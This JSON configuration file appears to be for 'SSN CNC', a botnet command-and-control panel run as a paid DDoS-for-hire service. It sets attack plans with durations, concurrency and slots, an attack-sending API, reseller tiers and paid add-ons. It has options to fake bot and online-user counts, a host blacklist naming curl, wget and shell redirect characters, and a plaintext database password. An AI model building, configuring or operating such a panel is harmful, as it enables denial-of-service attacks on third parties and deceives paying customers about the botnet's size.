{
    "license_key": "YOUR LICENSE KEY GOES HERE",
    "ssh_server_config": {
        "server_ip_address": "YOUR SERVER IP GOES HERE",
        "private_key": "assets/sshKey.ppk"
    },
    "cnc_whitelisting": {
        "enabled": false,
        "whitelisted_ips": [
            "1.3.3.7",
            "1.2.3.4"
        ]
    },
    "api_access_config": {
        "note": "use port 80 if you plan to use cloudflare to protect your api.",
        "api_ip_address": "YOUR SERVER IP GOES HERE (MAKE SURE TO ENABLE IT ON LINE 12 AND RUN `service apache2 stop` ON YOUR SERVER)",
        "api_port": 80,
        "settings": {
            "api_access_enabled": false,
            "debug_mode_enabled": false,
            "custom_attack_sent_page": {
                "enabled": false,
                "html_file": "attack_sent.html"
            }
        }
    },
    "database": {
        "host": "localhost:3306",
        "username": "user723432",
        "password": "RBkijsHcqLJpiSTq7hrSsfdpQQq6KE6a?!",
        "table": "db834674"
    },
    "settings": {
        "initial_connection": {
            "display_banner": {
                "enabled": false,
                "message": "Welcome to C2! We hope you enjoy your stay."
            },
            "max_auth_tries": 3
        },
        "mfa": {
            "forced": false,
            "app_name": "SSN CNC",
            "forced_on": {
                "note": "please only enable one of the options below.",
                "all_users": false,
                "exclude_users": {
                    "enabled": false,
                    "users": [
                        "root"
                    ]
                },
                "single_users": {
                    "enabled": false,
                    "users": []
                },
                "exclude_admin": true
            }
        },
        "captcha": {
            "forced": false,
            "ascii": true,
            "forced_on": {
                "note": "please only enable one of the options below.",
                "all_users": false,
                "exclude_users": {
                    "enabled": false,
                    "users": [
                        "root"
                    ]
                },
                "single_users": {
                    "enabled": false,
                    "users": []
                },
                "exclude_admin": true
            }
        },
        "prompt": {
            "gradient": {
                "enabled": false,
                "settings": {
                    "initial_hex_colour": "FF00D5",
                    "final_hex_colour": "00CDFF"
                },
                "suffix_settings": {
                    "suffix_space": false,
                    "suffix_colour": "[97m",
                    "suffix_text": ""
                },
                "foreground": {
                    "enabled": true
                },
                "background": {
                    "enabled": false,
                    "text_colour": "[30m"
                }
            }
        },
        "logging": {
            "log_ips": true,
            "log_attacks_to_file": true,
            "log_failed_api_requests": true
        },
        "timeouts": {
            "api_timeout_seconds": 30,
            "server_timeout_seconds": 30,
            "botnet_timeout_seconds": 30,
            "max_idle_seconds": 999999
        },
        "visual": {
            "classic_ongoing_command": false,
            "classic_online_command": false,
            "forced_use_of_dport": false
        },
        "reseller_permissions": {
            "can_create_how_many_users_per_day": 3,
            "can_edit_users_they_made": true,
            "can_view_user_count_command": true,
            "can_remove_users_they_made": true,
            "can_kick_users_they_made": true,
            "can_ban_users_they_made": true,
            "can_lock_users_they_made": true,
            "can_view_users_they_made": true,
            "can_add_new_resellers": true
        },
        "general": {
            "name": "SSN CNC",
            "title_update_sleep": 1500,
            "first_login": {
                "initial_username_change": false,
                "initial_password_change": true,
                "allow_account_override_on_first_login": false
            },
            "options": {
                "tos_page_enabled": false,
                "allow_multi_concurrent_api_attacks": false,
                "api_users_can_send_attacks_from_cnc": true
            },
            "guest_user": {
                "enabled": false,
                "username": "guest"
            },
            "new_user_defaults": {
                "theme": "default",
                "max_daily_attacks": 1000
            },
            "misc": {
                "numverify_access_key": "numverify.com api key goes here",
                "expired_message": "Your account has expired."
            },
            "fake_bots": {
                "max": 41206,
                "min": 40541
            },
            "fake_online_users": {
                "enabled": false,
                "add_extra": 6
            },
            "username_blacklists": []
        },
        "information_rewrites": {
            "online_command": {
                "user_ip_address": {
                    "hide": true,
                    "hidden_text": "*.*.*.*"
                },
                "user_username": {
                    "hide": true,
                    "hidden_text": "User"
                },
                "unknown_ssh_client": "Unknown"
            },
            "ongoing_command": {
                "target": {
                    "hide": false,
                    "hidden_text": "?"
                },
                "method": {
                    "hide": true,
                    "hidden_text": "?"
                },
                "port": {
                    "hide": true,
                    "hidden_text": "?"
                },
                "duration": {
                    "hide": true,
                    "hidden_text": "?"
                },
                "remaining": {
                    "hide": false,
                    "hidden_text": "?"
                },
                "attack_sender": {
                    "hide": true,
                    "hidden_text": "?"
                }
            },
            "host_information": {
                "unknown_region": "?",
                "unknown_country": "?",
                "unknown_country_code": "?",
                "unknown_city": "?",
                "unknown_zip": "?",
                "unknown_isp": "?",
                "unknown_asn": "?",
                "unknown_org": "?",
                "unknown_timezone": "?"
            }
        },
        "dlc_options": {
            "aio_funnel": {
                "information": "you must have the paid aio funnel dlc to use this feature",
                "note": "if you enable the option on the line below, your attacks will be sent through 'assets/dlc/funnel.json'",
                "enabled": false
            },
            "gambling": {
                "information": "you must have the paid gambling dlc to use this feature",
                "enabled": false,
                "games": [
                    {
                        "name": "dice",
                        "enabled": true
                    }
                ]
            },
            "reverse_proxy": {
                "information": "you must have the paid reverse proxy dlc to use this feature",
                "enabled": false,
                "api_token": "xxxxxxxxxxxxxxxxxxxxxxxx",
                "api_host": "127.0.0.1",
                "api_port": 8089
            }
        },
        "developer": {
            "terminal": {
                "width": 800,
                "height": 22
            },
            "disabled_commands": [],
            "blocked_ssh_clients": [
                "ssh2js",
                "ubuntu"
            ]
        }
    },
    "webhooks": {
        "telegram": {
            "attack_sent": {
                "token": "",
                "title": "USER ATTACK SENT SUCCESSFULLY",
                "chat_id": "",
                "enabled": false
            },
            "blacklisted_host": {
                "token": "",
                "title": "USER TRIED ATTACKING BLACKLIST",
                "chat_id": "",
                "enabled": false
            },
            "ip_log": {
                "token": "",
                "title": "USER LOGGED IN",
                "chat_id": "",
                "enabled": false
            },
            "failed_mfa": {
                "token": "",
                "title": "USER FAILED MFA",
                "chat_id": "",
                "enabled": false
            },
            "failed_captcha": {
                "token": "",
                "title": "USER FAILED CAPTCHA",
                "chat_id": "",
                "enabled": false
            },
            "reseller_actions": {
                "token": "",
                "title": "RESELLER ACTION ALERT",
                "chat_id": "",
                "enabled": false
            },
            "admin_actions": {
                "token": "",
                "title": "ADMIN ACTION ALERT",
                "chat_id": "",
                "enabled": false
            }
        },
        "discord": {
            "attack_sent": {
                "webhook": "",
                "title": "USER ATTACK SENT SUCCESSFULLY",
                "image": "https://www.clker.com/cliparts/0/f/7/0/11954234311954389563ok_mark_h_kon_l_vdal_02.svg.med.png",
                "hex_color": "",
                "enabled": false
            },
            "blacklisted_host": {
                "webhook": "",
                "title": "USER TRIED ATTACKING BLACKLIST",
                "image": "https://www.clker.com/cliparts/5/9/5/4/12456868161725760927raemi_Cross_Out.svg.med.png",
                "hex_color": "",
                "enabled": false
            },
            "ip_log": {
                "webhook": "",
                "title": "USER LOGGED IN",
                "image": "https://pluspng.com/img-png/attention-sign-png-attention-sign-traffic-road-sign-warning-caution-788.png",
                "hex_color": "",
                "enabled": false
            },
            "failed_mfa": {
                "webhook": "",
                "title": "USER FAILED MFA",
                "image": "http://www.clker.com/cliparts/f/3/8/9/1194984837281670682DangerGeneral.svg.med.pngg",
                "hex_color": "",
                "enabled": false
            },
            "failed_captcha": {
                "webhook": "",
                "title": "USER FAILED CAPTCHA",
                "image": "http://www.clker.com/cliparts/f/3/8/9/1194984837281670682DangerGeneral.svg.med.png",
                "hex_color": "",
                "enabled": false
            },
            "reseller_actions": {
                "webhook": "",
                "title": "RESELLER ACTION ALERT",
                "image": "https://upload.wikimedia.org/wikipedia/commons/thumb/4/4e/OOjs_UI_icon_alert_destructive.svg/480px-OOjs_UI_icon_alert_destructive.svg.png",
                "hex_color": "",
                "enabled": false
            },
            "admin_actions": {
                "webhook": "",
                "title": "ADMIN ACTION ALERT",
                "image": "https://upload.wikimedia.org/wikipedia/commons/thumb/4/4e/OOjs_UI_icon_alert_destructive.svg/480px-OOjs_UI_icon_alert_destructive.svg.png",
                "hex_color": "",
                "enabled": false
            }
        }
    },
    "attack_settings": {
        "method_groups": [
            {
                "name": "main_network",
                "max_slots": 1000,
                "cooldown": 0,
                "custom_role_name": "main_network"
            },
            {
                "name": "private_network",
                "max_slots": 3,
                "cooldown": 0,
                "custom_role_name": "private_network"
            }
        ],
        "blacklists": {
            "host": [
                ".gov",
                ".edu",
                "curl",
                "wget",
                "1.2.3.4",
                "1.1.1.1",
                "8.8.8.8",
                ">",
                "newblacklist",
                "github",
                "<",
                "mysql",
                "localhost"
            ],
            "port": [
                19999
            ],
            "as_number": [
                12345
            ]
        },
        "user_spam_protection": {
            "in_general": {
                "settings": {
                    "enabled": false,
                    "amount": 10,
                    "per_seconds": 1200
                },
                "what_action_to_take": {
                    "note": "please only enable one of the options below. (Note: This is still being worked on)",
                    "warn_and_block_attack": true,
                    "give_captcha": false,
                    "lock_account": {
                        "message": "Automated account lock, reason: Spam",
                        "duration_in_days": 7,
                        "enabled": false
                    },
                    "close_user_session": false
                }
            },
            "per_target": {
                "settings": {
                    "enabled": false,
                    "amount": 3,
                    "per_seconds": 30
                },
                "what_action_to_take": {
                    "note": "please only enable one of the options below. (Note: This is still being worked on)",
                    "warn_and_block_attack": true,
                    "give_captcha": false,
                    "lock_account": {
                        "message": "Automated account lock, reason: Spam",
                        "duration_in_days": 7,
                        "enabled": false
                    },
                    "close_user_session": false
                }
            }
        },
        "attack_options": {
            "general_options": {
                "debug_mode_enabled": true,
                "attacks_enabled": true,
                "admins_bypass_disabled_attacks": false,
                "total_attack_slots": {
                    "max": 50,
                    "enabled": true
                },
                "users_bypass_total_slots": {
                    "enabled": false,
                    "users": []
                }
            },
            "cnc_options": {
                "cnc_global_cooldown": {
                    "enabled": true,
                    "per_attack_delay_ms": 1000
                },
                "time_before_port": false,
                "after_attack_command_cooldown": {
                    "enabled": false,
                    "seconds": 5
                }
            },
            "api_options": {
                "api_global_cooldown": {
                    "enabled": true,
                    "per_attack_delay_ms": 600
                },
                "show_host_information_in_api_response": true,
                "threads": {
                    "default": 5,
                    "max": 100,
                    "min": 1
                },
                "rps": {
                    "default": 64,
                    "max": 300,
                    "min": 1
                },
                "geo": {
                    "default": "ALL",
                    "list": [
                        "CN",
                        "JP",
                        "US"
                    ]
                }
            }
        }
    },
    "plan_presets": [
        {
            "name": "MONTHLY",
            "options": {
                "vip": {
                    "enabled": false,
                    "vip_duration_in_days": 30
                },
                "reseller": false,
                "mod": false,
                "admin": false,
                "custom_roles": {
                    "enabled": true,
                    "roles": [
                        {
                            "role_name": "l4_role",
                            "role_duration_in_days": 30
                        }
                    ]
                },
                "api_access": false,
                "bypass_power_saving": false,
                "bypass_spam_protection": false,
                "bypass_blacklist": false,
                "bypass_soft_max_time": false,
                "cooldown_in_seconds": 0,
                "max_time_in_seconds": 300,
                "max_concurrents": 1,
                "plan_length_in_days": 30
            }
        },
        {
            "name": "MONTHLYVIP",
            "options": {
                "vip": {
                    "enabled": true,
                    "vip_duration_in_days": 30
                },
                "reseller": false,
                "mod": false,
                "admin": false,
                "custom_roles": {
                    "enabled": false,
                    "roles": [
                        {
                            "role_name": "l4_role",
                            "role_duration_in_days": 30
                        }
                    ]
                },
                "api_access": false,
                "bypass_power_saving": false,
                "bypass_spam_protection": false,
                "bypass_blacklist": false,
                "bypass_soft_max_time": false,
                "cooldown_in_seconds": 0,
                "max_time_in_seconds": 300,
                "max_concurrents": 1,
                "plan_length_in_days": 30
            }
        }
    ],
    "themes": [
        {
            "name": "default",
            "description": "Minimalistic, clean, simple, and straight to the point.",
            "example": "assets/banners/default/branding/clear_splash.tfx",
            "colour": "[38;5;39m"
        }
    ],
    "custom_banners": [
        {
            "name": "settings",
            "description": "View the settings page.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": true
            },
            "path_to_banner": "assets/banners/{THEME}/commands/settings.tfx",
            "command_aliases": []
        },
        {
            "name": "methods",
            "description": "View attack methods page.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": false
            },
            "path_to_banner": "assets/banners/{THEME}/commands/methods.tfx",
            "command_aliases": [
                "method"
            ]
        },
        {
            "name": "usage",
            "description": "View correct attack syntax.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": false
            },
            "path_to_banner": "assets/banners/{THEME}/commands/usage.tfx",
            "command_aliases": [
                "syntax"
            ]
        },
        {
            "name": "plan",
            "description": "View your plan details.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": false
            },
            "path_to_banner": "assets/banners/{THEME}/commands/plan.tfx",
            "command_aliases": [
                "acc",
                "account"
            ]
        },
        {
            "name": "help",
            "description": "View the help page.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": false
            },
            "path_to_banner": "assets/banners/{THEME}/commands/help.tfx",
            "command_aliases": [
                "h",
                "?"
            ]
        },
        {
            "name": "vip",
            "description": "View the vip page.",
            "require_role": {
                "custom_role": {
                    "enabled": false,
                    "role_name": ""
                },
                "vip": false,
                "reseller": false,
                "mod": false,
                "admin": false
            },
            "path_to_banner": "assets/banners/{THEME}/commands/vip.tfx",
            "command_aliases": [
                "vipp"
            ]
        }
    ]
}